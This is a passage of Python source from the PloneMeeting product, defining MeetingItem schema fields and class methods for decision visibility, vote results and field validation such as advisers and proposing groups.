label_msgid='PloneMeeting_label_meetingTransitionInsertingMe',\n i18n_domain='PloneMeeting',\n ),\n enforceVocabulary=True,\n vocabulary='listMeetingTransitions',\n ),\n TextField(\n name='itemAssembly',\n allowable_content_types=('text/plain',),\n widget=TextAreaWidget(\n condition=\"python: here.is_assembly_field_used('itemAssembly')\",\n description=\"ItemAssembly\",\n description_msgid=\"item_assembly_descr\",\n label_method=\"getLabelItemAssembly\",\n label='Itemassembly',\n label_msgid='PloneMeeting_label_itemAssembly',\n i18n_domain='PloneMeeting',\n visible=False,\n ),\n default_output_type=\"text/x-html-safe\",\n default_content_type=\"text/plain\",\n ),\n TextField(\n name='itemAssemblyExcused',\n allowable_content_types=('text/plain',),\n widget=TextAreaWidget(\n condition=\"python: here.is_assembly_field_used('itemAssemblyExcused')\",\n description=\"ItemAssemblyExcused\",\n description_msgid=\"item_assembly_excused_descr\",\n label='Itemassemblyexcused',\n label_msgid='PloneMeeting_label_itemAssemblyExcused',\n i18n_domain='PloneMeeting',\n visible=False,\n ),\n default_output_type=\"text/x-html-safe\",\n default_content_type=\"text/plain\",\n ),\n TextField(\n name='itemAssemblyAbsents',\n allowable_content_types=('text/plain',),\n widget=TextAreaWidget(\n condition=\"python: here.is_assembly_field_used('itemAssemblyAbsents')\",\n description=\"ItemAssemblyAbsents\",\n description_msgid=\"item_assembly_absents_descr\",\n label='Itemassemblyabsents',\n label_msgid='PloneMeeting_label_itemAssemblyAbsents',\n i18n_domain='PloneMeeting',\n visible=False,\n ),\n default_output_type=\"text/x-html-safe\",\n default_content_type=\"text/plain\",\n ),\n TextField(\n name='itemAssemblyGuests',\n allowable_content_types=('text/plain',),\n widget=TextAreaWidget(\n condition=\"python: here.is_assembly_field_used('itemAssemblyGuests')\",\n description=\"ItemAssemblyGuests\",\n description_msgid=\"item_assembly_guests_descr\",\n label='Itemassemblyguests',\n label_msgid='PloneMeeting_label_itemAssemblyGuests',\n i18n_domain='PloneMeeting',\n visible=False,\n ),\n default_output_type=\"text/x-html-safe\",\n default_content_type=\"text/plain\",\n ),\n TextField(\n name='itemSignatures',\n allowable_content_types=('text/plain',),\n widget=TextAreaWidget(\n condition=\"python: here.is_assembly_field_used('itemSignatures')\",\n description=\"ItemSignatures\",\n description_msgid=\"item_signatures_descr\",\n label='Itemsignatures',\n label_msgid='PloneMeeting_label_itemSignatures',\n i18n_domain='PloneMeeting',\n visible=False,\n ),\n default_output_type='text/plain',\n default_content_type='text/plain',\n ),\n LinesField(\n name='copyGroups',\n widget=MultiSelectionWidget(\n size=10,\n condition=\"python: here.attribute_is_used('copyGroups')\",\n description=\"CopyGroupsItems\",\n description_msgid=\"copy_groups_item_descr\",\n format=\"checkbox\",\n label='Copygroups',\n label_msgid='PloneMeeting_label_copyGroups',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n enforceVocabulary=True,\n multiValued=1,\n vocabulary_factory='Products.PloneMeeting.vocabularies.itemcopygroupsvocabulary',\n ),\n StringField(\n name='pollType',\n widget=SelectionWidget(\n condition=\"python: (here.attribute_is_used('pollType') or \"\n \"here.isVotesEnabled()) and here.adapted().mayChangePollType()\",\n label='Polltype',\n label_msgid='PloneMeeting_label_pollType',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n default_method=\"getDefaultPollType\",\n enforceVocabulary=True,\n vocabulary_factory='Products.PloneMeeting.vocabularies.polltypesvocabulary'\n ),\n TextField(\n name='pollTypeObservations',\n widget=RichWidget(\n label_msgid=\"PloneMeeting_label_pollTypeObservations\",\n condition=\"python: here.attribute_is_used('pollTypeObservations')\",\n description_msgid=\"descr_field_vieawable_by_everyone\",\n label='Polltypeobservations',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n searchable=True,\n allowable_content_types=('text/html',),\n default_output_type=\"text/x-html-safe\",\n optional=True,\n write_permission=WriteItemMeetingManagerFields,\n ),\n TextField(\n name='committeeObservations',\n allowable_content_types=('text/html',),\n widget=RichWidget(\n condition=\"python: here.attribute_is_used('committeeObservations')\",\n description_msgid=\"descr_field_editable_by_committee_editors\",\n label='Committeeobservations',\n label_msgid='PloneMeeting_label_committeeObservations',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n default_output_type=\"text/x-html-safe\",\n searchable=True,\n optional=True,\n write_permission=WriteCommitteeFields,\n ),\n TextField(\n name='committeeTranscript',\n allowable_content_types=('text/html',),\n widget=RichWidget(\n condition=\"python: here.attribute_is_used('committeeTranscript')\",\n description_msgid=\"descr_field_vieawable_by_committee_editors\",\n label='Committeetranscript',\n label_msgid='PloneMeeting_label_committeeTranscript',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n default_output_type=\"text/x-html-safe\",\n searchable=True,\n optional=True,\n write_permission=WriteCommitteeFields,\n ),\n TextField(\n name='votesObservations',\n widget=RichWidget(\n label_msgid=\"PloneMeeting_label_votesObservations\",\n condition=\"python: here.adapted().show_votesObservations()\",\n description_msgid=\"field_vieawable_by_everyone_once_item_decided_descr\",\n label='Votesobservations',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n searchable=True,\n allowable_content_types=('text/html',),\n default_output_type=\"text/x-html-safe\",\n optional=True,\n write_permission=WriteItemMeetingManagerFields,\n ),\n ReferenceField(\n name='manuallyLinkedItems',\n referencesSortable=True,\n default=[],\n widget=ReferenceBrowserWidget(\n description=\"ManuallyLinkedItems\",\n description_msgid=\"manually_linked_items_descr\",\n condition=\"python: here.attribute_is_used('manuallyLinkedItems') and \"\n \"not here.isDefinedInTool()\",\n allow_search=True,\n allow_browse=False,\n base_query=\"manuallyLinkedItemsBaseQuery\",\n show_results_without_query=False,\n allow_sorting=False,\n label='Manuallylinkeditems',\n label_msgid='PloneMeeting_label_manuallyLinkedItems',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n multiValued=True,\n relationship=\"ManuallyLinkedItem\",\n ),\n LinesField(\n name='otherMeetingConfigsClonableTo',\n widget=MultiSelectionWidget(\n condition=\"here/showClonableToOtherMCs\",\n format=\"checkbox\",\n label='Othermeetingconfigsclonableto',\n label_msgid='PloneMeeting_label_otherMeetingConfigsClonableTo',\n i18n_domain='PloneMeeting',\n ),\n enforceVocabulary=True,\n multiValued=1,\n vocabulary_factory='Products.PloneMeeting.vocabularies.other_mcs_clonable_to_vocabulary',\n ),\n LinesField(\n name='otherMeetingConfigsClonableToEmergency',\n widget=MultiSelectionWidget(\n condition=\"python: here.attribute_is_used('otherMeetingConfigsClonableToEmergency')\",\n format=\"checkbox\",\n label=\"Othermeetingconfigsclonabletoemergency\",\n label_msgid='PloneMeeting_label_otherMeetingConfigsClonableToEmergency',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n enforceVocabulary=True,\n multiValued=1,\n vocabulary_factory='Products.PloneMeeting.vocabularies.other_mcs_clonable_to_emergency_vocabulary',\n ),\n LinesField(\n name='otherMeetingConfigsClonableToPrivacy',\n widget=MultiSelectionWidget(\n condition=\"python: here.attribute_is_used('otherMeetingConfigsClonableToPrivacy')\",\n format=\"checkbox\",\n label=\"Othermeetingconfigsclonabletoprivacy\",\n label_msgid='PloneMeeting_label_otherMeetingConfigsClonableToPrivacy',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n enforceVocabulary=True,\n multiValued=1,\n vocabulary_factory='Products.PloneMeeting.vocabularies.other_mcs_clonable_to_privacy_vocabulary',\n ),\n StringField(\n name='otherMeetingConfigsClonableToFieldTitle',\n searchable=True,\n default='',\n widget=StringWidget(\n condition=\"python: here.attribute_is_used('otherMeetingConfigsClonableToFieldTitle')\",\n label_msgid=\"PloneMeeting_label_itemTitle\",\n label='OtherMeetingConfigsClonableToFieldTitle',\n i18n_domain='PloneMeeting',\n maxlength=750,\n ),\n optional=True,\n ),\n TextField(\n name='otherMeetingConfigsClonableToFieldDescription',\n widget=RichWidget(\n condition=\"python: here.attribute_is_used('otherMeetingConfigsClonableToFieldDescription')\",\n label_msgid=\"PloneMeeting_label_itemDescription\",\n label='Description',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n searchable=True,\n allowable_content_types=('text/html',),\n default_output_type=\"text/x-html-safe\",\n optional=True,\n ),\n TextField(\n name='otherMeetingConfigsClonableToFieldDetailedDescription',\n widget=RichWidget(\n condition=\"python: here.attribute_is_used('otherMeetingConfigsClonableToFieldDetailedDescription')\",\n label_msgid=\"PloneMeeting_label_detailedDescription\",\n label='Detaileddescription',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n searchable=True,\n allowable_content_types=('text/html',),\n default_output_type=\"text/x-html-safe\",\n optional=True,\n ),\n TextField(\n name='otherMeetingConfigsClonableToFieldMotivation',\n widget=RichWidget(\n condition=\"python: here.attribute_is_used('otherMeetingConfigsClonableToFieldMotivation')\",\n label='OtherMeetingConfigsClonableToFieldMotivation',\n label_msgid='PloneMeeting_label_motivation',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n read_permission=\"PloneMeeting: Read decision\",\n searchable=True,\n allowable_content_types=('text/html',),\n default_output_type=\"text/x-html-safe\",\n optional=True,\n write_permission=WriteDecision,\n ),\n TextField(\n name='otherMeetingConfigsClonableToFieldDecision',\n widget=RichWidget(\n condition=\"python: here.attribute_is_used('otherMeetingConfigsClonableToFieldDecision')\",\n label='OtherMeetingConfigsClonableToFieldDecision',\n label_msgid='PloneMeeting_label_decision',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n read_permission=\"PloneMeeting: Read decision\",\n searchable=True,\n allowable_content_types=('text/html',),\n default_output_type=\"text/x-html-safe\",\n optional=True,\n write_permission=WriteDecision,\n ),\n TextField(\n name='otherMeetingConfigsClonableToFieldDecisionSuite',\n widget=RichWidget(\n condition=\"python: here.attribute_is_used('otherMeetingConfigsClonableToFieldDecisionSuite')\",\n label='OtherMeetingConfigsClonableToFieldDecisionSuite',\n label_msgid='PloneMeeting_label_decisionSuite',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n read_permission=\"PloneMeeting: Read decision\",\n searchable=True,\n allowable_content_types=('text/html',),\n default_output_type=\"text/x-html-safe\",\n optional=True,\n write_permission=WriteDecision,\n ),\n TextField(\n name='otherMeetingConfigsClonableToFieldDecisionEnd',\n widget=RichWidget(\n condition=\"python: here.attribute_is_used('otherMeetingConfigsClonableToFieldDecisionEnd')\",\n label='OtherMeetingConfigsClonableToFieldDecisionEnd',\n label_msgid='PloneMeeting_label_decisionEnd',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n read_permission=\"PloneMeeting: Read decision\",\n searchable=True,\n allowable_content_types=('text/html',),\n default_output_type=\"text/x-html-safe\",\n optional=True,\n write_permission=WriteDecision,\n ),\n BooleanField(\n name='isAcceptableOutOfMeeting',\n default=False,\n widget=BooleanField._properties['widget'](\n condition=\"python: here.showIsAcceptableOutOfMeeting()\",\n description=\"IsAcceptableOutOfMeeting\",\n description_msgid=\"is_acceptable_out_of_meeting_descr\",\n label='Isacceptableoutofmeeting',\n label_msgid='PloneMeeting_label_isAcceptableOutOfMeeting',\n i18n_domain='PloneMeeting',\n ),\n ),\n BooleanField(\n name='sendToAuthority',\n default=False,\n widget=BooleanField._properties['widget'](\n condition=\"python: here.attribute_is_used('sendToAuthority')\",\n description=\"SendToAuthority\",\n description_msgid=\"send_to_authority_descr\",\n label='Sendtoauthority',\n label_msgid='PloneMeeting_label_sendToAuthority',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n ),\n StringField(\n name='privacy',\n default='public',\n widget=SelectionWidget(\n condition=\"python: here.attribute_is_used('privacy')\",\n label='Privacy',\n label_msgid='PloneMeeting_label_privacy',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n vocabulary_factory='Products.PloneMeeting.vocabularies.privaciesvocabulary'\n\n ),\n StringField(\n name='completeness',\n default='completeness_not_yet_evaluated',\n widget=SelectionWidget(\n condition=\"python: here.attribute_is_used('completeness') and \"\n \"(here.adapted().mayEvaluateCompleteness() or here.adapted().mayAskCompletenessEvalAgain())\",\n description=\"Completeness\",\n description_msgid=\"item_completeness_descr\",\n visible=False,\n label='Completeness',\n label_msgid='PloneMeeting_label_completeness',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n vocabulary='listCompleteness',\n ),\n BooleanField(\n name='itemIsSigned',\n default=False,\n widget=BooleanField._properties['widget'](\n condition=\"python: here.showItemIsSigned()\",\n label='Itemissigned',\n label_msgid='PloneMeeting_label_itemIsSigned',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n ),\n StringField(\n name='takenOverBy',\n widget=StringField._properties['widget'](\n condition=\"python: here.attribute_is_used('takenOverBy')\",\n label='Takenoverby',\n label_msgid='PloneMeeting_label_takenOverBy',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n ),\n TextField(\n name='textCheckList',\n allowable_content_types=('text/plain',),\n widget=TextAreaWidget(\n condition=\"python: here.showMeetingManagerReservedField('textCheckList')\",\n description=\"Enter elements that are necessary for this kind of item\",\n description_msgid=\"text_check_list_descr\",\n label='TextCheckList',\n label_msgid='PloneMeeting_label_textCheckList',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n write_permission=WriteItemMeetingManagerFields,\n default_output_type=\"text/x-html-safe\",\n default_content_type=\"text/plain\",\n ),\n\n),\n)\n\nMeetingItem_schema = OrderedBaseFolderSchema.copy() + \\\n schema.copy()\n\n# Make title longer\nMeetingItem_schema['title'].widget.maxlength = '750'\n# Define a specific msgid for title\nMeetingItem_schema['title'].widget.i18n_domain = 'PloneMeeting'\nMeetingItem_schema['title'].widget.label_msgid = 'PloneMeeting_label_itemTitle'\n\n\nclass MeetingItem(OrderedBaseFolder, BrowserDefaultMixin):\n \"\"\"\n \"\"\"\n security = ClassSecurityInfo()\n implements(IMeetingItem)\n\n meta_type = 'MeetingItem'\n _at_rename_after_creation = True\n\n schema = MeetingItem_schema\n\n security.declarePublic('title_or_id')\n\n def title_or_id(self, withTypeName=True):\n '''Implemented the deprecated method 'title_or_id' because it is used by\n archetypes.referencebrowserwidget in the popup. We also override the\n view to use it in the widget in edit mode. This way, we can display\n more informations than just the title.'''\n if withTypeName:\n return \"{0} - {1}\".format(translate(self.portal_type,\n domain=\"plone\",\n context=self.REQUEST).encode('utf-8'),\n self.Title(withMeetingDate=True))\n return self.Title(withMeetingDate=True)\n\n def Title(self, withMeetingDate=False, **kwargs):\n title = self.getField('title').get(self, **kwargs)\n if withMeetingDate:\n meeting = self.getMeeting()\n # XXX check on datetime to be removed after Meeting migration to DX\n if meeting and isinstance(meeting.date, datetime):\n tool = api.portal.get_tool('portal_plonemeeting')\n return \"{0} ({1})\".format(\n title, tool.format_date(meeting.date, with_hour=True).encode('utf-8'))\n return title\n\n security.declarePublic('getPrettyLink')\n\n def getPrettyLink(self, **kwargs):\n \"\"\"Return the IPrettyLink version of the title.\"\"\"\n adapted = IPrettyLink(self)\n adapted.target = '_parent'\n adapted.showContentIcon = kwargs.get('showContentIcon', True)\n for k, v in kwargs.items():\n setattr(adapted, k, v)\n if not self.adapted().isPrivacyViewable():\n adapted.isViewable = False\n return adapted.getLink()\n\n def _mayNotViewDecisionMsg(self):\n \"\"\"Return a message specifying that current user may not view decision.\n Decision is hidden when using 'hide_decisions_when_under_writing' WFAdaptation\n when meeting is 'decided' and user may not edit the item.\"\"\"\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n adaptations = cfg.getWorkflowAdaptations()\n # manage case of accepted item that is no more editable by MeetingManagers\n # but the meeting in this case is still editable\n meeting = self.getMeeting()\n if meeting and 'hide_decisions_when_under_writing' in adaptations and \\\n meeting.query_state() == 'decided' and \\\n not (_checkPermission(ModifyPortalContent, self) or\n _checkPermission(ModifyPortalContent, meeting)):\n # do not return unicode as getDecision returns 'utf-8' usually\n return translate('decision_under_edit',\n domain='PloneMeeting',\n context=self.REQUEST,\n default=HIDE_DECISION_UNDER_WRITING_MSG).encode('utf-8')\n\n security.declarePublic('getMotivation')\n\n def getMotivation(self, **kwargs):\n '''Override 'motivation' field accessor. It allows to manage\n the 'hide_decisions_when_under_writing' workflowAdaptation that\n hides the motivation/decision for non-managers if meeting state is 'decided.'''\n # hide the decision?\n msg = self._mayNotViewDecisionMsg()\n return msg or self.getField('motivation').get(self, **kwargs)\n\n security.declarePublic('getRawMotivation')\n\n def getRawMotivation(self, **kwargs):\n '''See self.getMotivation docstring.'''\n # hide the decision?\n msg = self._mayNotViewDecisionMsg()\n return msg or self.getField('motivation').getRaw(self, **kwargs)\n\n security.declarePublic('getDecision')\n\n def getDecision(self, **kwargs):\n '''Override 'decision' field accessor.\n Manage the 'hide_decisions_when_under_writing' workflowAdaptation that\n hides the decision for non-managers if meeting state is 'decided.'''\n # hide the decision?\n msg = self._mayNotViewDecisionMsg()\n return msg or self.getField('decision').get(self, **kwargs)\n\n security.declarePublic('getRawDecision')\n\n def getRawDecision(self, **kwargs):\n '''See self.getDecision docstring.'''\n # hide the decision?\n msg = self._mayNotViewDecisionMsg()\n return msg or self.getField('decision').getRaw(self, **kwargs)\n\n def _get_votes_result_cachekey(method, self, check_is_html=True):\n '''cachekey method for self._get_votes_result.'''\n return repr(self), self.modified(), check_is_html\n\n @ram.cache(_get_votes_result_cachekey)\n def _get_votes_result(self, check_is_html=True):\n \"\"\"Compute votesResult using MeetingConfig.votesResultTALExpr.\n When p_check_is_html=True result is checked and if it is not HTML\n a portal_message is displayed to the user.\"\"\"\n extra_expr_ctx = _base_extra_expr_ctx(self)\n # quick bypass when not used or if item not in a meeting\n expr = extra_expr_ctx['cfg'].getVotesResultTALExpr().strip()\n if not expr or not self.hasMeeting():\n return ''\n\n extra_expr_ctx.update({'item': self, 'meeting': self.getMeeting()})\n # default raise_on_error=False so if the expression\n # raise an error, we will get '' for reference and a message in the log\n res = _evaluateExpression(self,\n expression=expr,\n roles_bypassing_expression=[],\n extra_expr_ctx=extra_expr_ctx,\n empty_expr_is_true=False)\n # make sure we do not have None\n res = res or ''\n # make sure result is HTML\n if res and check_is_html and not is_html(res):\n api.portal.show_message(\n _('votes_result_not_html'), request=self.REQUEST, type='warning')\n res = ''\n return safe_encode(res)\n\n security.declarePublic('getVotesResult')\n\n def getVotesResult(self, real=False, **kwargs):\n '''Override 'votesResult' field accessor.\n If empty we will return the evaluated MeetingConfig.votesResultExpr.'''\n res = self.getField('votesResult').get(self, **kwargs)\n if not real and not res:\n res = self._get_votes_result(**kwargs)\n return res\n\n security.declarePublic('getRawVotesResult')\n\n def getRawVotesResult(self, real=False, **kwargs):\n '''See getVotesResult docstring.'''\n res = self.getField('votesResult').getRaw(self, **kwargs)\n if not real and not res:\n res = self._get_votes_result(**kwargs)\n return res\n\n security.declarePrivate('validate_category')\n\n def validate_category(self, value):\n '''Checks that, if we use categories, a category is specified.\n The category will not be validated when editing an item template.'''\n\n # bypass for itemtemplates\n if self.isDefinedInTool(item_type='itemtemplate'):\n return\n\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n # check if value is among categories defined in the MeetingConfig\n if self.attribute_is_used('category') and \\\n value not in cfg.categories.objectIds():\n return translate('category_required', domain='PloneMeeting', context=self.REQUEST)\n\n security.declarePrivate('validate_committees')\n\n def validate_committees(self, values):\n '''Checks that the NO_COMMITTEE is the only value when selected.'''\n # remove empty strings and Nones\n values = [v for v in values if v]\n if NO_COMMITTEE in values and len(values) > 1:\n return translate('can_not_select_no_committee_and_committee',\n domain='PloneMeeting',\n context=self.REQUEST)\n\n security.declarePrivate('validate_classifier')\n\n def validate_classifier(self, value):\n '''Checks that, if we use classifiers, a classifier is specified.\n The classifier will not be validated when editing an item template.'''\n\n # bypass for itemtemplates\n if self.isDefinedInTool(item_type='itemtemplate'):\n return\n\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n # check if value is among classifiers defined in the MeetingConfig\n if (self.attribute_is_used('classifier')) and value not in cfg.classifiers.objectIds():\n return translate('classifier_required', domain='PloneMeeting', context=self.REQUEST)\n\n security.declarePrivate('validate_groupsInCharge')\n\n def validate_groupsInCharge(self, value):\n '''Checks that, if we use the \"groupsInCharge\", a group in charge is specified,\n except when editing an item template.'''\n\n # bypass for itemtemplates\n if self.isDefinedInTool(item_type='itemtemplate'):\n return\n\n # remove empty strings and Nones\n value = [v for v in value if v]\n\n # check if field is enabled in the MeetingConfig\n if self.attribute_is_used('groupsInCharge') and not value:\n return translate('groupsInCharge_required', domain='PloneMeeting', context=self.REQUEST)\n\n security.declarePrivate('validate_itemAssembly')\n\n def validate_itemAssembly(self, value):\n '''Validate the itemAssembly field.'''\n if not validate_item_assembly_value(value):\n return translate('Please check that opening \"[[\" have corresponding closing \"]]\".',\n domain='PloneMeeting',\n context=self.REQUEST)\n\n security.declarePrivate('validate_pollType')\n\n def validate_pollType(self, value):\n '''Validate the pollType field.'''\n old_pollType = self.getPollType()\n if old_pollType != value:\n view = self.restrictedTraverse(\"@@change-item-polltype\")\n # validation_msg is None if it passed, True otherwise\n return view.validate_new_poll_type(old_pollType, value)\n\n security.declarePrivate('validate_proposingGroup')\n\n def validate_proposingGroup(self, value):\n '''proposingGroup is mandatory if used, except for an itemtemplate.'''\n # bypass for itemtemplates\n if self.isDefinedInTool(item_type='itemtemplate'):\n return\n\n if not value and not self.attribute_is_used('proposingGroupWithGroupInCharge'):\n return translate('proposing_group_required',\n domain='PloneMeeting',\n context=self.REQUEST)\n\n # while created thru plonemeeting.restapi for example, make sure\n # current user is member of proposingGroup\n\n if value and \\\n self.checkCreationFlag():\n tool = api.portal.get_tool('portal_plonemeeting')\n if value not in tool.get_orgs_for_user(\n only_selected=False, suffixes=[\"creators\"]):\n if not tool.isManager(realManagers=True):\n return translate(\n 'proposing_group_not_available',\n domain='PloneMeeting',\n context=self.REQUEST)\n\n security.declarePrivate('validate_proposingGroupWithGroupInCharge')\n\n def validate_proposingGroupWithGroupInCharge(self, value):\n '''proposingGroupWithGroupInCharge is mandatory if used, except for an itemtemplate.'''\n # bypass for itemtemplates\n if self.isDefinedInTool(item_type='itemtemplate'):\n return\n\n # make sure we have a proposingGroup and a groupInCharge in case configuration is not correct\n # we would have \"Proposing group ()\"\n if self.attribute_is_used('proposingGroupWithGroupInCharge'):\n proposingGroupUid = groupInChargeUid = ''\n if value:\n proposingGroupUid, groupInChargeUid = value.split('__groupincharge__')\n if not proposingGroupUid or not groupInChargeUid:\n return translate('proposing_group_with_group_in_charge_required',\n domain='PloneMeeting',\n context=self.REQUEST)\n\n security.declarePrivate('validate_optionalAdvisers')\n\n def validate_optionalAdvisers(self, values):\n '''When selecting an optional adviser, make sure that 2 values regarding the same\n group are not selected, this could be the case when using delay-aware advisers.\n Moreover, make sure we can not unselect an adviser that already gave his advice.'''\n # remove empty strings and Nones\n values = [v for v in values if v]\n\n # check that advice was not asked twice for same adviser\n # it can be a delay-aware advice and a simple advice\n # or 2 delay-aware advices for same group\n real_adviser_values = []\n adviser_userid_values = []\n adviser_rowid_userid_values = []\n real_adviser_userid_values = []\n for adviser in values:\n if '__userid__' not in adviser:\n if '__rowid__' in adviser:\n real_adviser_values.append(decodeDelayAwareId(adviser)[0])\n else:\n real_adviser_values.append(adviser)\n else:\n # '__userid__'\n if '__rowid__' in adviser:\n adviser_rowid_userid_values.append(decodeDelayAwareId(adviser)[0])\n real_adviser_userid_values.append(decodeDelayAwareId(adviser)[0])\n else:\n adviser_userid_values.append(adviser.split('__userid__')[0])\n real_adviser_userid_values.append(adviser.split('__userid__')[0])\n\n if len(set(real_adviser_values)) != len(real_adviser_values):\n return translate('can_not_select_several_optional_advisers_same_group',\n domain='PloneMeeting',\n context=self.REQUEST)\n # a value in real_adviser_values may not be in real_adviser_userid_values\n # that would mean for example a delay-aware adviser selected\n # and a userid for same not delay-aware advice\n # or more current, an adviers group and some userids of same group\n # we must either select group or user\n if set(real_adviser_values).intersection(real_adviser_userid_values):\n return translate('can_not_select_advisers_group_and_userids',\n domain='PloneMeeting',\n context=self.REQUEST)\n\n # check also that a userid is not selected for a rowid advice\n # and another userid for the corresponding non rowid advice\n if set(adviser_rowid_userid_values).intersection(adviser_userid_values):\n return translate('can_not_select_userids_for_same_advice_of_different_type',\n domain='PloneMeeting',\n context=self.REQUEST)\n\n # when advices are inherited, we can not ask another one for same adviser\n for adviser in values:\n rowid = ''\n if '__rowid__' in adviser:\n adviser_real_uid, rowid = decodeDelayAwareId(adviser)\n elif '__userid__' in adviser:\n adviser_real_uid, userid = adviser.split('__userid__')\n else:\n adviser_real_uid = adviser\n if adviser_real_uid in getattr(self, 'adviceIndex', {}) and \\\n self.adviceIndex[adviser_real_uid]['inherited']:\n # use getAdviceDataFor because we do not have every correct values\n # stored for an inherited advice, especially 'not_asked'\n adviceInfo = self.getAdviceDataFor(self, adviser_real_uid)\n if rowid != adviceInfo['row_id'] or adviceInfo['not_asked']:\n return translate('can_not_select_optional_adviser_same_group_as_inherited',\n domain='PloneMeeting',\n context=self.REQUEST)\n\n # find unselected advices and check if it was not already given\n storedOptionalAdvisers = self.getOptionalAdvisers()\n removedAdvisers = set(storedOptionalAdvisers).difference(set(values))\n if removedAdvisers:\n givenAdvices = self.getGivenAdvices()\n for removedAdviser in removedAdvisers:\n orig_removedAdviser = removedAdviser\n if '__rowid__' in removedAdviser:\n removedAdviser, rowid = decodeDelayAwareId(removedAdviser)\n elif '__userid__' in removedAdviser:\n removedAdviser, userid = removedAdviser.split('__userid__')\n if removedAdviser in givenAdvices and \\\n givenAdvices[removedAdviser]['optional'] is True:\n vocab = get_vocab(self, self.getField('optionalAdvisers').vocabulary_factory)\n # use term.sortable_title that contains the adviser title\n # when removing an advice asked to a userid\n return translate(\n 'can_not_unselect_already_given_advice',\n mapping={\n 'removedAdviser':\n vocab.getTermByToken(orig_removedAdviser).sortable_title},\n domain='PloneMeeting',\n context=self.REQUEST)\n return self.adapted().custom_validate_optionalAdvisers(\n values, storedOptionalAdvisers, removedAdvisers)\n\n def custom_validate_optionalAdvisers(self, value, storedOptionalAdvisers, removedAdvisers):\n '''See doc in interfaces.py.'''\n pass\n\n security.declarePublic('manuallyLinkedItemsBaseQuery')\n\n def manuallyLinkedItemsBaseQuery(self):\n '''base_query for the 'manuallyLinkedItems' field.\n Here, we restrict the widget to search only MeetingItems.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n allowed_types = []\n for cfg in tool.getActiveConfigs():\n allowed_types.append(cfg.getItemTypeName())\n query = {}\n query['portal_type'] = allowed_types\n query['sort_on'] = \"modified\"\n query['sort_order'] = \"reverse\"\n return query\n\n security.declarePublic('getDefaultBudgetInfo')\n\n def getDefaultBudgetInfo(self):\n '''The default budget info is to be found in the config.'''\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n return cfg.getBudgetDefault()\n\n security.declarePublic('showObservations')\n\n def showObservations(self):\n '''See doc in interfaces.py.'''\n item = self.getSelf()\n return item.attribute_is_used('observations')\n\n security.declarePublic('show_budget_infos')\n\n def show_budget_infos(self):\n '''Condition for showing budgetRelated/budgetInfos fields.'''\n # using field, viewable/editable\n if self.attribute_is_used(\"budgetInfos\") and \\\n api.user.get_current().has_permission('PloneMeeting: Read budget infos', self):\n return True\n\n security.declarePublic('show_groups_in_charge')\n\n def show_groups_in_charge(self):\n '''When field 'groupsInCharge' is used, it is editable.\n When using MeetingConfig.includeGroupsInChargeDefinedOnProposingGroup\n or MeetingConfig.includeGroupsInChargeDefinedOnCategory\n then it is editable by MeetingManagers.'''\n # using field, viewable/editable\n if self.attribute_is_used(\"groupsInCharge\"):\n return True\n\n res = False\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n _is_editing = is_editing(cfg)\n raw_groups_in_charge = self.getRawGroupsInCharge()\n # viewable if not empty\n if not _is_editing and raw_groups_in_charge:\n res = True\n # editable when not empty and user is MeetingManager\n # this may result from various functionnality like \"MeetingConfig.include...\"\n # except when using \"proposingGroupWithGroupInCharge\"\n elif not self.attribute_is_used(\"proposingGroupWithGroupInCharge\") and \\\n _is_editing and \\\n raw_groups_in_charge and \\\n tool.isManager(cfg):\n res = True\n return res\n\n security.declarePublic('show_committees')\n\n def show_committees(self):\n '''When field 'committees' is used, show it to editors if\n not using \"auto_from\" or if user is a MeetingManager.'''\n res = False\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n raw_committees = getattr(self, 'committees', ())\n # take care that committees is activated in MeetingConfig.usedMeetingAttributes\n if \"committees\" in cfg.getUsedMeetingAttributes() or raw_committees:\n res = True\n if is_editing(cfg):\n # when using \"auto_from\" in MeetingConfig.committees\n # field is only shown to MeetingManagers\n if cfg.is_committees_using(\"auto_from\") and not tool.isManager(cfg):\n res = False\n return res\n\n security.declarePublic('show_votesObservations')\n\n def show_votesObservations(self):\n '''See doc in interfaces.py.'''\n item = self.getSelf()\n res = False\n if item.attribute_is_used(\"votesObservations\") or \\\n item.getRawVotesObservations():\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(item)\n res = tool.isManager(cfg)\n if not res:\n res = tool.isPowerObserverForCfg(cfg) or item.is_decided(cfg)\n return res\n\n security.declarePublic('showIsAcceptableOutOfMeeting')\n\n def showIsAcceptableOutOfMeeting(self):\n '''Show the MeetingItem.isAcceptableOutOfMeeting field if WFAdaptation\n 'accepted_out_of_meeting' or 'accepted_out_of_meeting_and_duplicated'\n is used..'''\n tool = api.portal.get_tool('portal_plonemeeting')\n cfg = tool.getMeetingConfig(self)\n wfAdaptations = 